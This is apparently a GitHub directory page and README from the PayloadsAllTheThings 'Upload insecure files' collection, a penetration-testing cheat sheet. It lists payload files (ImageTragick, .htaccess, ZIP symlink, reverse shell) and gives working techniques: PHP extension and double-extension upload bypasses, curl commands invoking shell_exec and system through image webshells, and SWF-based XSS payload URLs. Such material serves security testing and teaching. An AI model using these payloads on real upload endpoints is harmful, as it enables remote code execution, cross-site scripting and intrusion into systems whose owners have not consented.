PayloadsAllTheThings/Upload insecure files
cclauss d642980f8c
Use octal numbers that work in both Python 2 and 3
python2 -c "print(0777 << 16L == 0o777 << 16)"  # True
2018-09-02 14:09:55 +02:00
..
Eicar XSS Intruder + Eicar + SSRF http://0 2017-07-30 13:17:00 +02:00
Ffmpeg HLS FFMpeg injection - Bypass and explanation 2017-06-28 22:45:36 +02:00
IIS MySQL - Code exec 2017-11-09 09:05:50 +01:00
IIS Web Config Path traversal refactor + AD cme module msf/empire + IIS web.config 2018-07-07 12:04:55 +02:00
Image Tragik Payloads - Quick fix 2018-02-23 13:48:51 +01:00
Image Tragik 2 ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
Insecure Flash More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
JPG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Metadata GIF More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
Metadata PNG More payloads for XSS/SQL/LFI/Upload and XXE 2017-06-04 17:22:26 +02:00
PHP .htaccess Markdown formatting - Part 2 2018-08-13 12:01:13 +02:00
PHP Extension SSRF AWS + Shell.php{3,4,5,7} 2017-09-27 14:37:07 +02:00
PNG Resize Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Python __init__.py Use octal numbers that work in both Python 2 and 3 2018-09-02 14:09:55 +02:00
ZIP Symbolic Link Reverse Shell Cheatsheet 2017-08-03 21:35:43 +02:00
README.md Markdown formatting update 2018-08-12 23:30:22 +02:00

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Exploits

Image Tragik

HTTP Request
Reverse Shell
Touch command

PHP Extension

.php

Less known extension
.pht
.pgif
.phtml
.shtml

Double extension
.jpeg.php
.png.php

PNG Bypass a resize

Upload the picture and use a local file inclusion

You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"

JPG Bypass a resize

Upload the picture and use a local file inclusion

http://localhost/test.php?c=ls

XSS via SWF

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);

Thanks to

  • Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil